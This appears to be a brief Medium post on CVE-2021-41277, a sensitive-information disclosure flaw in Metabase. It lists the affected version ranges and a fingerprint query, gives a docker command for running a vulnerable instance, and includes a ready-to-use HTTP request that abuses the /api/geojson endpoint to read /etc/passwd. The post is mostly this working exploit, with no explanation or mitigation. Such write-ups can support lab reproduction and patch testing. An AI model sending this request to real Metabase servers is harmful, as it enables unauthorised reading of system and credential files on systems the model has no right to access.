CVE-2021–41277 Metabase sensitive information disclosure

app="metabase"
metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4
GET /api/geojson?url=file:/etc/passwd HTTP/1.1

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store